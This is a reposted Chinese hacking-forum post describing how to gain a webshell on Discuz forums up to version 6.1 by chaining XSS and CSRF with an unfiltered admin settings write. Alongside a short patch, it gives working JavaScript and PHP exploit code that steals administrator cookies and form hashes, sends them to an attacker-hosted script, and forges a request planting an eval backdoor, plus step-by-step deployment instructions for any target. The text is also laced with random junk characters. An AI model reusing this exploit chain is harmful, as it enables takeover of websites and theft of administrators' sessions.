找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3679|回复: 0
打印 上一主题 下一主题

Discuz XSS得webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:11:49 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
Discuz XSS得webshell8 O" [3 x) C/ H
By racle @tian6.com
" f5 E$ v* U. _  [: K/ b; Y& N; O/ C欢迎转帖.但请保留版权信息.0 ]0 u8 b% ^1 H1 Q: A  }( c
受影响版本iscuz<=6.1.0,gbk+utf+big57 R7 i) b4 \( a1 T
5 i% G- A5 A  y3 [0 ^  ?! r( h
新增加完全JS利用版本,只有一个文件.ajax-racle.js.有效版本提升至DZ6.1(理论上7.0版本都可以,但是6.1以上版本都已经默认打上补丁),新增浏览器版本判断,对方浏览器为IE或FIREFOX都有效.
1 \; z: e) M4 i% v$ r
  E0 Q! h) ~) @5 U7 b0 G7 O7 [" u
& A6 {4 {1 [+ H) y# J( x4 d& Q3天前有朋友在论坛问过,说Discuz有个非论坛创始人获得WEBSHELL的漏洞,是superhei早前发出来的一大堆DISCUZ漏洞之一.见原帖:http://bbs.tian6.com/redirect.ph ... 54794&ptid=8706/ _2 n/ e) ~. y" }8 H5 Q, }7 T
当时我说一会就弄出来给大家,但是实际上一接触,发现这个漏洞本身需要管理员后台权限,要广泛普遍的利用还是很复杂的,主要是以下几个问题,所以拖到今天才基本完工.
7 U% e- D; M# Z. D- Y' n7 M9 D: o' Z% W! l
分析和写EXP的过程中,得到t0by57,Superhei的大力帮助.他们PHP和JS都不错的哦!希望大家看这篇文章时,更注意分析和明白的过程,毕竟XSS是目前WEB安全的最大头戏.各种形式:XSIO,Cross Iframe Trick,crsf等等..9 O( m' T" b7 Q
本帖补充其中一个FLASH XSS应用方法:配合Discuz得shell-Flash XSS* \: M. a# R" I' l  M% q' z5 K& X+ E: V

! |( F9 Y* D7 ~& j9 p2 R& t2 X. h" J% a/ Y: s; A1 p, U) |
----------------------------------------------------------前言分隔线-----------------------------------------------------------------------------
* X1 e  b& y# E4 B7 B8 C- G% t" O3 |( [
0 o- J+ K; U! N
problem1:漏洞页面runwizard.inc.php数据提交方式为post.需要模拟POST提交.5 N7 J" V" v" K) E
9 U5 Y: u9 b( j6 X* R# k' H
problem2ISCUZ论坛在数据提交的时候还验证了referer,因此还要伪造一下.php socket和js都可以伪造referer.. e$ C0 z3 e5 f8 G; G- B  J( F
, E8 n0 \* T; L7 |; @
problem3:formhash()函数采用了用户名+密码+XXX的算法得出,程序本身没办法模拟算出来,于是又耗费了我一段时间,最终想到个傻办法,从源代码里读出来.呵呵.这里是参考了superhei的一个旧EXP想出来的.) b+ F8 J4 R% v5 P6 f
) c, c0 t8 I+ _/ r

' S; m  g/ i( I" \# [下面,我为大家简单说说这个漏洞的成因和补的办法.这里是有漏洞的文件代码:bbs/admin/runwizard.inc.php,里面有个函数function saverunwizardhistory() {& s( o- h8 u) i4 m5 H/ m
, Y, J% S: f7 Y
        global $runwizardfile, $runwizardhistory;9 E" F" f9 m" X# j& H* s5 v, E

8 N' b0 b1 U: a7 F5 @) f( J        $fp = fopen($runwizardfile, 'w');
& {8 T: J2 G% Y4 d4 A' A6 T, C0 i+ O! K& w: K+ D1 L  P
        fwrite($fp, serialize($runwizardhistory));* q9 _) T5 c2 o# L. q  U

2 ^: R7 s/ c# e; n        fclose($fp);$ o0 g) I& j) l# `9 |0 C6 P& e/ }
* `0 W" e0 c( e  u5 A% J
}; k1 `6 R  d+ Y3 }
复制代码serialize($runwizardhistory)直接就写进$fp里.runwizardhistory是什么呢?是论坛一些基本的配置信息,譬如论坛名.反应在论坛后台,位置是:discuz.com/bbs/admincp.php?action=runwizard&step=2.论坛名称,地址等三项信息都没任何过滤.该三项内容任何一项都可以直接写入一句话,提交,然后保存在缓存:bbs/forumdata/logs/runwizardlog.php里.8 N7 i$ y6 ?0 Q: }
以下是修补的办法:function saverunwizardhistory() {
+ X9 m. \1 \6 V, R8 h. B% [  k* L. d. l
        global $runwizardfile, $runwizardhistory;
) P, l( S$ o3 t% p- @
5 O& r, z/ Z6 _) C        $fp = fopen($runwizardfile, 'w');# z! J8 {' q& T& [

/ M! n5 z$ z* r% H7 S        $s = '<?php exit;?>';, F' X4 z: O) D! R# I
) b. A/ I% T7 K) K8 A0 D; \
        $s .= serialize($runwizardhistory);
5 ~4 C: E7 [+ y; }9 s
+ f. X& ~* |- s7 ~1 B        fwrite($fp, $s);- O: U4 J8 a, A$ N; n- D
$ j0 U" I9 \( V/ I' J" r/ k$ h
        fclose($fp);% y7 O8 x3 _: P) ^9 [( W8 S
. P7 Q4 h6 A: X/ |2 D. ~! L, g
}
" H% x3 K/ N2 r: n/ z复制代码加写 '<?php exit;?>';到最前面,退出并且忽略该文件后面所有PHP代码.这么即使里面有一句话,也不能再被执行./ N2 n4 s4 ^$ _5 ]& J+ }# t

& e7 V+ k' y9 D% ^0 Q  H) w# l' m
4 I! Z. j+ A- U8 S* e# J7 m
% _' R& C& y0 q. R1 y----------------------------------------漏洞的成因和利用方法分隔线-----------------------------------------------------------------------------4 I; m3 J# O% ~' q7 h, g& m" y* D. G

, E0 j$ e0 D1 L# z; j# \# M
  o5 P: a% P/ }0 @, }* ^" {, `& W  以上是该漏洞的成因和利用方法.大家看到这里,估计也认为这是个鸡肋漏洞了吧,首先要有管理员权限,有后台权限,然后才能上WEBSHELL,实话说,有后台权限,拿SHELL的办法也并不止这一个.所以这个洞的价值,看起来就不大了.当然,这个已经被发布的nday不是我本帖要讲的重点.这里我主要是想告诉大家,将XSS,Crsf和本漏洞联合起来的办法.这样该洞价值就大很多了.
. C4 C" M6 Q- w' F- }0 O6 e; Q7 d" b3 U% i
我们的思路是:论坛上有个xss点,Crsf flash(的确有,Discuz! member.php xss bug,Discuz! 数据库错误信息xss bug,Discuz! flash Crsf bug,Discuz! admincp.php xss bug,Discuz![flash] xss bug),管理员点击或浏览后,就执行了我们的JS,带他到外部一个JS中,通过JS获得他的COOKIES,获得他的HASH,然后经过外部一个PHP封装SOCKET以POST的形式提交前面说的动作,如果论坛没有补上该问题(目前没几个论坛补了.当然,天阳已经补了.^^),那么就会产生bbs/forumdata/logs/runwizardlog.php这个WEBSHELL.
5 o1 V, L- X" P7 ?; |% u" M7 b6 G  {4 |# {  N! |) }
这篇文章主要不是给大家个EXP,然后让大家拿着到处乱黑的,主要是讲方法,讲思路.因为这里学问不少.
) Y7 M% _  C$ I0 K/ [# r2 L5 |. M) @
: J1 q8 u* C' n+ B首先我们要看,怎么通过JS,获得管理员COOKIES,然后把COOKIES传递给最终提交的PHP.获得的办法相信大家都知道,但是传递的办法,譬如以图片形式传递,就非常稳定和实用.是实现AJAX本地语言到服务器语言PHP的好办法.JS部分代码:
7 C  x5 K% I% ?- _" I/ s& f0 U& v; @8 ^. E
var url="http://目标网站/admincp.php";      
% `9 f3 X7 x( E: M; x  F3 {
: b2 `4 v+ r- \/ g4 r/*获得cookies*/4 l/ ~5 ^+ V6 U7 L

3 s: \' |) J" G" {1 _! dfunction getURL(s) {
$ n" K, c3 X% z$ @
3 s" a& q% N  k1 Q& L' \% dvar image = new Image();, t7 B2 M2 F7 x4 s- e; f

2 v6 R& b2 d- c, S8 Q4 \image.style.width = 0;0 G& h' |/ K8 a8 c5 i/ _: R1 C
  t( X" b' X* t4 L) L& k
image.style.height = 0;
0 c4 r* a$ V' K5 _, H+ z$ V- W( v* j6 N0 W" r& ?) ~
image.src = s;
+ f& b( T4 ^7 {% J2 H' S$ x. q1 E; L0 p: p6 A" [* M) c% O* a
}5 t. h* e4 q' |5 u* T
- p- m( @2 j* I6 e* ?
getURL("我们做好的接收cookies的.php?x="+encodeURIComponent(document.cookie));  //这里就通过image变量传给了php/ l3 F% F2 Z1 w2 m* g
复制代码php以get方式接收过来的变量.$cookies=$_GET['x'];' R* V# @- k: [( o- J
复制代码同理,hash我也是这么传到PHP里.不过HASH的获得方法也是很有意思的,众所周知,discuz有formhash来保护每个授权访问的唯一性.但是你也可以发现,在论坛页面用户退出的地方,引用了这个hash.我们要做的,就是从页面的源文件里搜索出hash,筛选出来,传递给PHP即可.筛选的办法很多,你有兴趣的话,可以看看我的筛选JS代码(而且这里discuz其实还留了一手,呵呵) 8 c2 i' m  y6 ?/ w9 Q! G# i4 N

8 F8 E7 y3 G! V# u0 ^$ Q1 \: |5 M. Z5 T  b1 M& g' @  z9 }
获得了cookies和hash以后,我们需要结合完整数据,做一次模拟提交,大家可以看看,这个是我之前写好的AJAX提交方式:var url="http://tian6.com/raclebbs/";/ i. C( W# j4 O- \
% S8 v9 J) m' G) B* B6 E: G3 _0 M

+ J. ~' c/ T! v' K  U1 {" B2 u, y
1 |/ X% W5 W+ w7 v% _/*hash*/9 n; J" g' D' K0 N8 L5 Z+ i( F
$ @! A. v$ k! t( y% S& L# W6 O
var xmlHttpReq = new ActiveXObject("MSXML2.XMLHTTP.3.0");
  x; m0 y, L, T! j2 @- e) G- k* O8 I8 S* N! Q
xmlHttpReq.open("GET", url+"admincp.php?action=home", false);3 q* t& q: Z; K

3 i4 K$ g! {6 i" {$ y4 ~; FxmlHttpReq.send();. k; I* S9 h  N. H$ I* @9 R# x
* y& O% ^" ~! k- U9 r
var resource = xmlHttpReq.responseText;: W, p, ]* H5 V( s' ]3 ^
/ q: Y+ O. q; v7 p2 `2 E7 B  F
var numero = resource.search(/formhash/);/ v! \8 H7 G! E8 O5 J% j$ O
' O5 s/ q6 A1 t) L1 P4 z, g
var formhash=encodeURIComponent(resource.substr(numero+17,8));
' b7 M) x+ E8 }$ s( y
$ V2 S1 P# k% L* l% i8 E' v: _  i( q: w' n( `) }
% p7 h$ z" E+ E: G2 H. z$ X
var post="formhash="+formhash+"&anchor=&settingsnew%5Bbbname%5D=1&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5";//构造要携带的数据 - Z0 p' ~6 j' Q$ u7 @
, m) N4 n: f8 f' O
xmlHttpReq.open("OST",url+"admincp.php?action=runwizard&step=3",false);//使用POST方法打开一个到服务器的连接,以异步方式通信 $ @& Y& W! p8 ?3 m7 }7 u/ Q( A

0 d, W7 @" {% k) a/ ixmlHttpReq.setRequestHeader("Referer", url);, i4 Y3 g6 i9 l% u7 H

6 b5 M# x& u+ y* O) l9 pxmlHttpReq.setrequestheader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");2 n( Q, E4 p! V6 Q1 S# @6 ]! E, m

8 `! N) W8 p7 N5 ?. u% VxmlHttpReq.setrequestheader("content-length",post.length); , L! I! i1 i& e! _; n) j3 Y7 |6 k5 |; b

, N" L2 T7 q, d0 ?- rxmlHttpReq.setrequestheader("content-type","application/x-www-form-urlencoded"); 6 H) ?, Z( [9 r# \$ @( d

3 l5 m3 H2 s9 x) j' S7 exmlHttpReq.send(post);//发送数据& |4 [. v( d) v/ h2 ]8 ^; \3 y
复制代码这里HASH我假设正确,这样提交,也无须cookies
" ?+ n/ e- N& O. h* E* A3 p) b3 Q7 p7 p% {& r$ M
再看看以PHP SOCKET形式提交.$sock = fsockopen("$url", 80, $errno, $errstr, 30);
2 T0 x  g1 t7 M! D3 j+ ?/ C( F+ [2 G8 c1 ]4 X% n2 P! e# `
if (!$sock) die("$errstr ($errno)\n");' f: Z3 K' A! a6 W. ]
+ L- g0 L' w& k" N0 u7 O5 Z
$data = 'formhash='.$hash.'&anchor=&settingsnew%5Bbbname%5D=Discuz&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5';
1 L, e0 a4 u; B* \# j$ {8 S
9 \/ f4 E: ~+ v# P5 E! r
$ A0 s! T6 W% l+ N+ b
" B2 S0 F; [$ ^) Wfwrite($sock, "OST http://$url/admincp.php?action=runwizard&step=3 HTTP/1.1\r\n");
8 H3 |* k  m) N8 r- \; {) B% G4 N- C! U% y+ c7 A9 m' H( f0 X
fwrite($sock, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*\r\n");7 G& r) B0 X) N% a  ?
! u* _1 b' Z8 B( C/ S4 E7 h2 c3 |
fwrite($sock, "Referer: http://$url/admincp.php?action=runwizard&step=2\r\n");
2 p( V% v9 L/ l4 V  G  W! T* R/ @0 W# I* U9 y. d* J
fwrite($sock, "Accept-Language: zh-cn\r\n");+ I/ D$ k& a- L5 f

4 w' }, g# y$ J; yfwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");2 W% V' t8 A: G5 k1 R. `
& F3 L. |" Q! G# ]% b
fwrite($sock, "Accept-Encoding: gzip, deflate\r\n");
0 m4 I$ g; O8 ^2 _0 g4 w& `3 z7 v
. H+ _+ W' f, o0 R6 Nfwrite($sock, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) (Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)); .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n");, o& T+ f5 Z' w5 t8 x( v3 _
$ a, z( _9 G1 A; ~2 Y4 F  ]6 ~
fwrite($sock, "Host: $url\r\n");6 |/ U4 p9 \- [+ J' |+ K0 z
3 b3 r$ a& P; m, b
fwrite($sock, "Content-Length: ".strlen($data)."\r\n");
  z+ m4 p, z' Q3 D% p# \
! _9 q1 s* s; i) O& G/ d5 Bfwrite($sock, "Connection: Keep-Alive\r\n");
% W4 w# x8 U# \: u0 F+ t1 j) L* l7 p6 f6 j2 r  J; z
fwrite($sock, "Cache-Control: no-cache\r\n");2 S: D' C0 h1 Q1 z2 s
4 o" m: c; V2 P) e2 `7 g9 z
fwrite($sock, "Cookie:".$cookies."\r\n\r\n");  N0 m( p  L, X  ~9 ~+ k: G7 X
6 l( d% q; _1 ^( ?; \
fwrite($sock, $data);9 G+ u' n3 N- a3 R; |) x* r# k
+ [. w, f- r/ t  Q: o7 z- N3 L9 P" e

, S$ P3 C# V5 b- n5 k3 h. |# `
: G/ D3 t: ^6 _6 M( K  P$headers = "";  U" q" \; ~) y# q* U: y
- j$ a1 N5 X/ X- s: A4 l5 m" {6 l) Q5 R
while ($str = trim(fgets($sock, 4096)))8 n# G, J' _$ U5 o" H" N- M) L

+ Y6 M6 a. U9 ^1 @5 W     $headers .= "$str\n";
" B5 @( n1 J% T
! n( a  ~+ P5 l( ?  \echo "\n";! J& M  t7 T& U" @; d) E" o

1 \; C5 H3 {# {! P) d% k4 c2 m+ C$body = "";6 ^8 K& U" `! @$ @3 a! ^
" b8 @5 e% @: `
while (!feof($sock))) Y: @9 Q: F% Z0 O: B

* {; P  R# s- E' [% h     $body .= fgets($sock, 4096);
. ~! |( i( \' S5 C, b$ M7 ]# n+ a
6 O4 A. C% s! x- m- o2 V8 O' l8 Qfclose($sock);
0 _; N$ e6 ]1 g7 T" T: o8 i$ V
6 C, e% m2 `  @1 M" a) N8 N& m; O7 A( qecho $body;! n% ~% J' l& V$ G
复制代码整个漏洞XSS应用大致如此,下面附上JS文件,PHP封装好的提交文件.利用文件限制一下,已注册用户才可以下载,刚来也没关系,仔细看看前面的分析,你也差不多能写出来.^^/ D. u& d+ S6 D" S) a9 H8 t8 t2 f
' ?: s! ?# b2 {
; B% Y: ~9 p2 O; z4 K
-------------------------------------------XSS文件分析分隔线-----------------------------------------------------------------------------
# Z2 f6 m. D5 s' q) k+ M# z& f
6 _# u, T4 Z" @! Z( K+ D8 ?1 A: x& ?4 G
1HP SOCKET利用方法首先打开racle.js8 q9 W+ F6 T8 l' _% i" x' F3 I! V
5 ]' n' h! y! v- f. W8 |8 j
var url="http://tian6.com/raclebbs/admincp.php?action=home"; //改成你要XSS攻击的目标,譬如http://www.discuz.com/admincp.php?action=home
( r7 v- a4 Q' F8 x- j/ T/ Z+ z3 |* b( X8 W# ^

; ~6 l$ k# g$ a3 G% s7 {0 x- r+ ]& T' m3 W1 d  }
然后打开racle@tian6.php, y, `5 _0 `3 Q- m* H, p4 G
1 _% `% y! Y/ j: u2 Q
$url="racle@tian6.com";   //改成你要XSS攻击的目标,譬如www.discuz.com
: h) M8 B1 Q0 q) m- j) v. ^) E- h# H

# q0 V4 j$ ]" P. @6 j8 y$ }
- x* K6 l6 F; M% X+ u: l! Z如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:
7 ~2 z5 i# {/ B# V* J
  F6 z. p# Y" e7 J: ?$ agetURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+17,8))+"&x="+encodeURIComponent(document.cookie));
% p1 ]6 K8 a/ Z8 M( h7 {" t5 _0 U" m" _

3 t# x0 j0 f- C% m& V9 I
3 `# d" ~* a" |2 L, E) @2 ~getURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+9,8))+"&x="+encodeURIComponent(document.cookie));- n+ G9 E0 Y: r( x9 }4 J4 q
复制代码2:JS利用方法打开ajax-racle.js,修改var url="http://tian6.com/raclebbs/";为你要攻击的论坛地址.
: t2 F. N3 e/ ^. e' i
$ j' i; ~6 A7 z( c' G
  f: S2 G& b; U7 C" x; `; V' F% n; {  J: x# y2 P  C8 X
如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:
! _* o2 ^) \) m  U7 \- P# j' z# V( t- }6 `+ W8 A
var formhash=encodeURIComponent(resource.substr(numero+17,8));8 ^" c, v! ]1 p9 L9 Y, [- k* P' @0 X

- B- u+ Y$ L1 K; S
& T, E' \( ^$ U- J$ Z# q, q. `& v1 p1 l" U# T! m
var formhash=encodeURIComponent(resource.substr(numero+9,8));4 ?9 _/ t) y3 d0 ]
复制代码ok.以上两种方法则其一.在攻击前,我们应该先看看论坛打上补丁没有,你可以尝试访问:http://target.com/bbs/forumdata/logs/runwizardlog.php,如果一片空白,那就没戏咯.不是空白就会有些论坛信息出现,但也不代表就肯定存在漏洞,因为可能人家补过之后没有更新过论坛信息而已.目前来说,有8成把握吧.
7 Z9 j. W) O1 K$ c3 ]  V! u6 m. S! x2 e6 {0 b
如果是第一种方法,就把racle.js,还有racle@tian6.php文件上传到一个可以执行PHP的地方,譬如你以前拿下的WEBSHELL里.两个文件需在同一目录下.记得该空间要支持PHP.然后在论坛以<script src=http://你放好的地方/racle.js></script>构造好XSS点.: L0 N% A5 Q% ~, Y; a; S: N2 k

2 b5 t8 h7 v1 T' X如果是第二种方法,就把ajax-racle.js,上传到一个你以前拿下的WEBSHELL里,然后在论坛以<script src=http://你放好的地方/ajax-racle.js></script>构造好XSS点.. {% {" k$ K1 x7 q* a) \! X
# J: G+ C4 r5 s0 h! I0 F) \7 s
不管你用什么方法,等到管理员一点该连接或者浏览一下论坛,他论坛bbs/forumdata/logs/runwizardlog.php里就多了个<?php eval($_POST[racle])?> ^^.赶紧拿控制端连上去吧.
8 f5 |9 n# \* M' q, F2 k4 F 8 S6 B& R( i3 y/ k# z3 i
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表